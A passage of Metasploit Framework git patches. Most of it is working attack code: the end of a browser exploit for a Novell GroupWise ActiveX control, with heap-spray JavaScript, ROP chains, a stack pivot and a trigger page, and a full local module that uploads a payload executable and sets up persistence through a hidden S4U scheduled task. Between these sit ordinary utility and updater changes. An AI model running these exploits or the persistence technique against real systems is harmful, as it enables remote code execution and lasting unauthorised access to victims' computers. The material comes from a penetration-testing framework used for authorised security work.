'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # gwcls1.dll 12.0.0.8586 + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], + [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ], + [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], + [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3ed' } ]#'0x5fe' } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 30 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + case my_target + when targets[7] + # IE 9 on Windows 7 + js = %Q| + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_random_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset_length = #{my_target['Offset']}; + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length); + var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + | + + else + # For IE 6, 7, 8 + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def stack_pivot + pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + return pivot + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil? + + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea + jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string + rop_payload << jmp_shell + rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) + rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset + rop_payload << [0x77c15ed5].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret + rop_payload << stack_pivot + rop_payload << code + else + print_status("Using JRE ROP") + rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea + jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string + rop_payload << jmp_shell + rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) + rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset + rop_payload << [0x7C348B05].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret + rop_payload << stack_pivot + rop_payload << code + end + + return rop_payload + end + + + def load_exploit_html(my_target, cli) + p = get_payload(my_target, cli) + js = ie_heap_spray(my_target, p) + + trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200 + + html = %Q| + <html> + <head> + <script> + #{js} + </script> + </head> + <body> + <object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'> + </object> + <script> + target.SetEngine(0x0c0c0c0c-0x20); + setInterval(function(){#{trigger}},1000); + </script> + </body> + </html> + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end + + +=begin + +* Remote Code Exec + +.text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20 +.text:103BDDEF test esi, esi +.text:103BDDF1 jnz short loc_103BDE17 +.text:103BDDF3 cmp [eax+426h], esi +.text:103BDDF9 jz short loc_103BDE17 // Check function pointer against nil? +.text:103BDDFB mov ecx, [ebp+arg_8] +.text:103BDDFE mov edx, [ebp+arg_4] +.text:103BDE01 push ecx +.text:103BDE02 mov ecx, [eax+42Ah] // Carefully crafted object allows to control it +.text:103BDE08 push edx +.text:103BDE09 mov edx, [eax+426h] // Carefully crafted object allows to control it +.text:103BDE0F push ecx +.text:103BDE10 call edx // Win! + +* Info Leak + +// Memory disclosure => 4 bytes from an arbitrary address +// Unstable when info leaking and triggering rce path... +target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll +var leak = target.GetMiscAccess(); +alert(leak); + +=end \ No newline at end of file From 17b349ab50bb6705b64eadb66d4a8c229a3b8d42 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 9 Feb 2013 17:49:57 +0100 Subject: [PATCH 337/421] added crash to comments --- .../windows/browser/novell_groupwise_gwcls1_actvx.rb | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index a3f50861e8ba..1b6971b5c26a 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -284,6 +284,17 @@ def on_request_uri(cli, request) * Remote Code Exec +(240.8d4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll - +eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58 +eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 +gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d: +10335e2d 8a8e4f040000 mov cl,byte ptr [esi+44Fh] ds:0023:0c0c103b=?? + + .text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20 .text:103BDDEF test esi, esi .text:103BDDF1 jnz short loc_103BDE17 From acdd952eb22bb4de33f7541611561a9f41973127 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sat, 9 Feb 2013 21:50:12 +0000 Subject: [PATCH 338/421] Initial commit --- lib/rex/text.rb | 71 +++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 57 insertions(+), 14 deletions(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 37137e7af330..95d465283a9b 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -39,8 +39,8 @@ module Text UpperAlpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" LowerAlpha = "abcdefghijklmnopqrstuvwxyz" Numerals = "0123456789" - Base32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" - Alpha = UpperAlpha + LowerAlpha + Base32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" + Alpha = UpperAlpha + LowerAlpha AlphaNumeric = Alpha + Numerals HighAscii = [*(0x80 .. 0xff)].pack("C*") LowAscii = [*(0x00 .. 0x1f)].pack("C*") @@ -307,16 +307,16 @@ def self.to_hex_ascii(str, prefix = "\\x", count = 1, suffix=nil) # # Supported unicode types include: utf-16le, utf16-be, utf32-le, utf32-be, utf-7, and utf-8 # - # Providing 'mode' provides hints to the actual encoder as to how it should encode the string. Only UTF-7 and UTF-8 use "mode". + # Providing 'mode' provides hints to the actual encoder as to how it should encode the string. Only UTF-7 and UTF-8 use "mode". # # utf-7 by default does not encode alphanumeric and a few other characters. By specifying the mode of "all", then all of the characters are encoded, not just the non-alphanumeric set. # to_unicode(str, 'utf-7', 'all') # # utf-8 specifies that alphanumeric characters are used directly, eg "a" is just "a". However, there exist 6 different overlong encodings of "a" that are technically not valid, but parse just fine in most utf-8 parsers. (0xC1A1, 0xE081A1, 0xF08081A1, 0xF8808081A1, 0xFC80808081A1, 0xFE8080808081A1). How many bytes to use for the overlong enocding is specified providing 'size'. - # to_unicode(str, 'utf-8', 'overlong', 2) + # to_unicode(str, 'utf-8', 'overlong', 2) # - # Many utf-8 parsers also allow invalid overlong encodings, where bits that are unused when encoding a single byte are modified. Many parsers will ignore these bits, rendering simple string matching to be ineffective for dealing with UTF-8 strings. There are many more invalid overlong encodings possible for "a". For example, three encodings are available for an invalid 2 byte encoding of "a". (0xC1E1 0xC161 0xC121). By specifying "invalid", a random invalid encoding is chosen for the given byte size. - # to_unicode(str, 'utf-8', 'invalid', 2) + # Many utf-8 parsers also allow invalid overlong encodings, where bits that are unused when encoding a single byte are modified. Many parsers will ignore these bits, rendering simple string matching to be ineffective for dealing with UTF-8 strings. There are many more invalid overlong encodings possible for "a". For example, three encodings are available for an invalid 2 byte encoding of "a". (0xC1E1 0xC161 0xC121). By specifying "invalid", a random invalid encoding is chosen for the given byte size. + # to_unicode(str, 'utf-8', 'invalid', 2) # # utf-7 defaults to 'normal' utf-7 encoding # utf-8 defaults to 2 byte 'normal' encoding @@ -360,7 +360,7 @@ def self.to_unicode(str='', type = 'utf-16le', mode = '', size = '') string = '' str.each_byte { |a| if (a < 21 || a > 0x7f) || mode != '' - # ugh. turn a single byte into the binary representation of it, in array form + # ugh. turn a single byte into the binary representation of it, in array form bin = [a].pack('C').unpack('B8')[0].split(//) # even more ugh. @@ -658,6 +658,49 @@ def self.to_hex_dump(str, width=16) buf << "\n" end + # + # Converts a string a nicely formatted and addressed ex dump + # + def self.to_addr_hex_dump(str, start_addr=0, width=16) + buf = '' + idx = 0 + cnt = 0 + snl = false + lst = 0 + addr = start_addr + + while (idx < str.length) + + buf << "%08x" % addr + buf << " " * 4 + chunk = str[idx, width] + line = chunk.unpack("H*")[0].scan(/../).join(" ") + buf << line + + if (lst == 0) + lst = line.length + buf << " " * 4 + else + buf << " " * ((lst - line.length) + 4).abs + end + + chunk.unpack("C*").each do |c| + if (c > 0x1f and c < 0x7f) + buf << c.chr + else + buf << "." + end + end + + buf << "\n" + + idx += width + addr += width + end + + buf << "\n" + end + # # Converts a hex string to a raw string # @@ -691,20 +734,20 @@ def self.wordwrap(str, indent = 0, col = DefaultWrap, append = '', prepend = '') # Converts a string to a hex version with wrapping support # def self.hexify(str, col = DefaultWrap, line_start = '', line_end = '', buf_start = '', buf_end = '') - output = buf_start - cur = 0 - count = 0 + output = buf_start + cur = 0 + count = 0 new_line = true # Go through each byte in the string str.each_byte { |byte| count += 1 - append = '' + append = '' # If this is a new line, prepend with the # line start text if (new_line == true) - append << line_start + append << line_start new_line = false end @@ -716,7 +759,7 @@ def self.hexify(str, col = DefaultWrap, line_start = '', line_end = '', buf_star # time to finish up this line if ((cur + line_end.length >= col) or (cur + buf_end.length >= col)) new_line = true - cur = 0 + cur = 0 # If this is the last byte, use the buf_end instead of # line_end @@ -1277,7 +1320,7 @@ def self.split_to_a(str, n) else ret = str end - ret + ret end # From 73f136ef9a8161deb2dda0a3d6b59ea0fb2aa1f3 Mon Sep 17 00:00:00 2001 From: Brandon Turner <brandon_turner@rapid7.com> Date: Mon, 4 Feb 2013 15:01:35 -0600 Subject: [PATCH 339/421] Update msfupdate to work with debian packages If apt was used to install framework, use apt-get to update. --- msfupdate | 43 +++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 41 insertions(+), 2 deletions(-) diff --git a/msfupdate b/msfupdate index 058fd8f51eaa..6b168d009129 100755 --- a/msfupdate +++ b/msfupdate @@ -30,9 +30,13 @@ if not (Process.uid == 0 or File.stat(msfbase).owned?) exit 0x10 end +def is_apt + File.exists?(File.expand_path(File.join(@msfbase_dir, '.apt'))) +end + # Are you an installer, or did you get here via a source checkout? def is_installed - File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) + File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) && !is_apt end def is_git @@ -69,6 +73,24 @@ def maybe_wait_and_exit(exit_code=0) end end +def apt_upgrade_available(package) + require 'open3' + installed = nil + upgrade = nil + ::Open3.popen3("apt-cache", "policy", package) do |stdin, stdout, stderr| + stdout.each do |line| + installed = $1 if line =~ /Installed: ([\w\-+.:~]+)$/ + upgrade = $1 if line =~ /Candidate: ([\w\-+.:~]+)$/ + break if installed && upgrade + end + end + if installed && installed != upgrade + upgrade + else + nil + end +end + # Some of these args are meaningful for SVN, some for Git, # some for both. Fun times. @args.each_with_index do |arg,i| @@ -186,7 +208,24 @@ if is_installed end end -unless is_svn || is_git || is_installed +if is_apt + $stdout.puts "[*] Checking for updates" + system("apt-get", "-qq", "update") + + packages = [] + packages << 'metasploit-framework' if framework_version = apt_upgrade_available('metasploit-framework') + packages << 'metasploit' if pro_version = apt_upgrade_available('metasploit') + + if packages.empty? + $stdout.puts "[*] No updates available" + else + $stdout.puts "[*] Updating to version #{pro_version || framework_version}" + system("apt-get", "install", "--assume-yes", *packages) + system("/etc/init.d/metasploit start") if packages.include?('metasploit') + end +end + +unless is_svn || is_git || is_installed || is_apt raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'" end From 3a499b1a6df332e4751f8fd8a3bd39bf3fb9988b Mon Sep 17 00:00:00 2001 From: smilingraccoon <smilingraccoon.gmail.com> Date: Sun, 10 Feb 2013 14:22:36 -0500 Subject: [PATCH 340/421] added s4u_persistence.rb --- data/exploits/s4u_persistence | 50 +++ .../exploits/windows/local/s4u_persistence.rb | 402 ++++++++++++++++++ 2 files changed, 452 insertions(+) create mode 100644 data/exploits/s4u_persistence create mode 100644 modules/exploits/windows/local/s4u_persistence.rb diff --git a/data/exploits/s4u_persistence b/data/exploits/s4u_persistence new file mode 100644 index 000000000000..2d736d225e64 --- /dev/null +++ b/data/exploits/s4u_persistence @@ -0,0 +1,50 @@ +<?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Date>DATEHERE</Date> + <Author>USERHERE</Author> + </RegistrationInfo> + <Triggers> + <TimeTrigger> + <Repetition> + <Interval>PT60M</Interval> + <StopAtDurationEnd>false</StopAtDurationEnd> + </Repetition> + <StartBoundary>DATEHERE</StartBoundary> + <Enabled>true</Enabled> + </TimeTrigger> + </Triggers> + <Principals> + <Principal id="Author"> + <UserId>DOMAINHERE</UserId> + <LogonType>S4U</LogonType> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>false</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>COMMANDHERE</Command> + </Exec> + </Actions> +</Task> \ No newline at end of file diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb new file mode 100644 index 000000000000..0d5189064ac6 --- /dev/null +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -0,0 +1,402 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/priv' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Priv + include Exploit::EXE + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage User Level Persistent Payload Installer', + 'Description' => %q{ + Creates a scheduled task that will run using service-for-user (S4U). + This allows the scheduled task to run even as an unprivileged user + that is not logged into the device. This will result in lower security + context, allowing access to local resources only. The module + requires 'Logon as a batch job' permissions (SeBatchLogonRight). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', + 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>' + ], + 'Platform' => [ 'windows' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'References' => [ + [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], + [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/'] + ] + )) + + register_options( + [ + OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']), + OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]), + OptString.new('REXENAME',[false, 'Name of exe on remote system']), + OptString.new('RTASKNAME',[false, 'Name of exe on remote system']), + OptString.new('PATH',[false, 'PATH to write payload']) + ], self.class) + + register_advanced_options( + [ + OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']), + OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']), + OptString.new('XPATH', [false, 'XPath query']) + ], self.class) + end + + def exploit + if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) + print_error("This module only works on Vista/2008 and above") + return + end + + if datastore['TRIGGER'] == "event" + if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? + print_error("Advanced options EVENT_LOG and EVENT_ID required for event") + print_status("The properties of any event in the event viewer will contain this information") + return + end + end + + # Generate payload + payload = generate_payload_exe + + # Generate remote executable name + rexename = generate_rexename + + # Generate path names + xml_path,rexe_path = generate_path(rexename) + + # Upload REXE to victim fs + upload_response = upload_rexe(rexe_path, payload) + return if not upload_response + + # Create basic XML outline + xml = create_xml(rexe_path) + + # Fix XML based on trigger + xml = add_xml_triggers(xml) + + # Write XML to victim fs, if fail clean up + if not write_xml(xml, xml_path) + delete_file(rexe_path) + return + end + + # Name task with Opt or give random name + schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + + # Create task with modified XML + task = create_task(xml_path, schname, rexe_path) + end + + ############################################################## + # Generate name for payload + # Returns name + + def generate_rexename + if datastore['REXENAME'].nil? + rexename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + return rexename + elsif datastore['REXENAME'] =~ /\.exe$/ + rexename = datastore['REXENAME'] + return rexename + else + print_warning("#{datastore['REXENAME']} isn't an exe") + return rexename + end + end + + ############################################################## + # Generate Path for payload upload + # Returns path for xml and payload + + def generate_path(rexename) + # generate a path to write payload and xml + path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" + rexe_path = "#{path}\\#{rexename}" + return xml_path,rexe_path + end + + ############################################################## + # Upload the executable payload + # Returns boolean for success + + def upload_rexe(path, payload) + vprint_status("Uploading #{path}") + if file? path + print_error("File #{path} already exists...exiting") + return false + end + begin + fd = client.fs.file.new(path, "wb") + fd.write(payload) + fd.close + rescue + print_error("Could not upload to #{path}") + return false + end + print_status("Successfully uploaded remote executable to #{path}") + return true + end + + ############################################################## + # Creates a scheduled task, exports as XML, deletes task + # Returns normal XML for generic task + + def create_xml(rexe_path) + xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence") + xml_file = File.new(xml_path,"r") + xml = xml_file.read + xml_file.close + + # Get local time, not system time from victim machine + begin + vt = client.railgun.kernel32.GetLocalTime(32) + ut = vt['lpSystemTime'].unpack("v*") + t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) + rescue + print_warning("Could not read system time from victim...using your local time to determine expire date") + t = ::Time.now + end + date = t.strftime("%Y-%m-%d") + time = t.strftime("%H:%M:%S") + + # put in correct times + xml = xml.gsub(/DATEHERE/, "#{date}T#{time}") + + domain, user = client.sys.config.getuid.split('\\') + + # put in user information + xml = xml.sub(/DOMAINHERE/, user) + xml = xml.sub(/USERHERE/, "#{domain}\\#{user}") + + xml = xml.sub(/COMMANDHERE/, rexe_path) + return xml + end + + ############################################################## + # Takes the XML, alters it based on trigger specified. Will also + # add in expiration tag if used. + # Returns the modified XML + + def add_xml_triggers(xml) + # Insert trigger + case datastore['TRIGGER'] + when 'logon' + # Trigger based on winlogon event, checks windows license key after logon + print_status("This trigger triggers on event 4101 which validates the Windows license") + line = "(EventID=4101) and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" + xml = create_trigger_event_tags("Application", line, xml) + + when 'lock' + xml = create_trigger_tags("SessionLock", xml) + + when 'unlock' + xml = create_trigger_tags("SessionUnlock", xml) + + when 'event' + line = "*[System[(EventID=#{datastore['EVENT_ID']})]]" + if not datastore['XPATH'].nil? + # Append xpath queries + line << " and #{datastore['XPATH']}" + end + vprint_status("XPath query: #{line}") + + xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml) + + when 'schedule' + # Change interval tag, insert into XML + if datastore['FREQUENCY'] != 0 + minutes = datastore['FREQUENCY'] + else + print_status("Defaulting frequency to every hour") + minutes = 60 + end + xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<") + + # Generate expire tag + end_boundary = create_expire_tag if datastore['EXPIRE_TIME'] + + # Inject expire tag + insert = xml.index("</StartBoundary>") + xml.insert(insert + 16, "\n #{end_boundary}") + end + return xml + end + + ############################################################## + # Creates end boundary tag which expires the trigger + # Returns XML for expire + + def create_expire_tag() + # Get local time, not system time from victim machine + begin + vt = client.railgun.kernel32.GetLocalTime(32) + ut = vt['lpSystemTime'].unpack("v*") + t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) + rescue + print_error("Could not read system time from victim...using your local time to determine expire date") + t = ::Time.now + end + + # Create time object to add expire time to and create tag + t = t + (datastore['EXPIRE_TIME'] * 60) + date = t.strftime("%Y-%m-%d") + time = t.strftime("%H:%M:%S") + end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>" + return end_boundary + end + + ############################################################## + # Creates trigger XML for session state triggers and replaces + # the time trigger. + # Returns altered XML + + def create_trigger_tags(trig, xml) + domain, user = client.sys.config.getuid.split('\\') + + # Create session state trigger, weird spacing used to maintain + # natural Winadows spacing for XML export + temp_xml = "<SessionStateChangeTrigger>\n" + temp_xml << " #{create_expire_tag}" if not datastore['EXPIRE_TIME'] + temp_xml << " <Enabled>true</Enabled>\n" + temp_xml << " <StateChange>#{trig}</StateChange>\n" + temp_xml << " <UserId>#{domain}\\#{user}</UserId>\n" + temp_xml << " </SessionStateChangeTrigger>" + + xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml) + + return xml + end + + ############################################################## + # Creates trigger XML for event based triggers and replaces + # the time trigger. + # Returns altered XML + + def create_trigger_event_tags(log, line, xml) + # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind + # used to maintain natural Windows spacing for XML export + temp_xml = "<EventTrigger>\n" + temp_xml << " #{create_expire_tag}\n" if not datastore['EXPIRE_TIME'] + temp_xml << " <Enabled>true</Enabled>\n" + temp_xml << " <Subscription><QueryList><Query Id=\"0\" " + temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">" + temp_xml << line + temp_xml << "</Select></Query></QueryList>" + temp_xml << "</Subscription>\n" + temp_xml << " </EventTrigger>" + + xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml) + return xml + end + + ############################################################## + # Takes the XML and a path and writes file to filesystem + # Returns boolean for success + + def write_xml(xml, path) + begin + if file? path + print_error("File #{path} already exists...exiting") + return false + end + fd = session.fs.file.new(path, "wb") + fd.write(xml) + fd.close + rescue + print_error("Issues writing XML to #{path}") + return false + end + print_status("Successfully wrote XML file to #{path}") + return true + end + + ############################################################## + # Takes path and delete file + # Returns boolean for success + + def delete_file(path) + begin + session.fs.file.rm(path) + rescue + print_warning("Could not delete file #{path}, delete manually") + return false + end + return true + end + + ############################################################## + # Takes path and name for task and creates final task + # Returns boolean for success + + def create_task(path, schname, rexe_path) + # create task using XML file on victim fs + create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"") + if create_task_response =~ /has successfully been created/ + print_good("Persistence task #{schname} created successfully") + + # Create to delete commands for exe and task + del_task = "schtasks /delete /tn \"#{schname}\" /f" + print_status("#{"To delete task:".ljust(20)} #{del_task}") + print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}") + del_task << "\ndel #{rexe_path}" + + # Delete XML from victim + delete_file(path) + + # Save info to notes DB + report_note(:host => session.session_host, + :type => "host.s4u_persistance.cleanup", + :data => { + :session_num => session.sid, + :stype => session.type, + :desc => session.info, + :platform => session.platform, + :via_payload => session.via_payload, + :via_exploit => session.via_exploit, + :created_at => Time.now.utc, + :delete_commands => del_task + } + ) + return true + elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ + print_error("The scheduled task name is already in use") + # Clean up + delete_file(rexe_path) + delete_file(path) + else + print_error("Issues creating task using XML file schtasks") + vprint_error("Error: #{create_task_response}") + if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" + print_warning("Security log can restricted by UAC, try a different trigger") + end + # Clean up + delete_file(rexe_path) + delete_file(path) + return false + end + end +end \ No newline at end of file From 55cba56591fc7befd7d71197a84b9433c67f3780 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 10 Feb 2013 21:10:00 -0600 Subject: [PATCH 341/421] Aux module for joernchen's devise vuln - CVE-2013-0233 --- .../admin/http/rails_devise_pass_reset.rb | 139 ++++++++++++++++++ 1 file changed, 139 insertions(+) create mode 100644 modules/auxiliary/admin/http/rails_devise_pass_reset.rb diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb new file mode 100644 index 000000000000..48ae2186ad10 --- /dev/null +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -0,0 +1,139 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# 